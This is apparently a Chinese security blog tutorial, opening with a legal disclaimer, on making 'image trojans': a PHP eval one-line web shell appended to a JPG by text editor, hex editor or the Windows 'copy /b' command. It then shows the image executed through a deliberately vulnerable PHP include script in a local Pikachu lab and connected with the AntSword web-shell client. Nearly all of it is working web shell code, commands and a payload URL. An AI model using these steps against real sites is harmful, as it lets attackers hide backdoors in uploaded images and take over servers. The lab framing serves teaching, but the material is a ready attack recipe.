中华人民共和国网络安全法及本人免责声明
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助。
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,读者请勿用于其他用途,否则后果自负。
一、图片码的制作
方式一:将图片用notepad++打开,在最后面写入一句话木马
<?php @eval($_POST['wenjian123abd']);?>
方式二:用winhex打开图片,末尾添加一句话木马
方式三:在windows的cmd中执行
copy 1.jpg/b+2.php/a 2.jpg
1.jpg是你要用的图片名
2.php是你要用的一句话木马名
2.jpg是生成的图片马名称
本来是两个文件,执行命令后会生成一个新文件,新文件就是图片马
二、图片马的使用
图片马的使用前提是系统存在文件包含漏洞
这里我们自己写一个php文件放入靶场www目录中,模拟文件包含漏洞
<?php
$file = $_GET['file'];
include $file;
?>
在蚁剑中输入payload
http://127.0.0.1/pikachu/vul/fileinclude.php?file=unsafeupload/uploads/3.jpg
测试图片马,三种方式均连接成功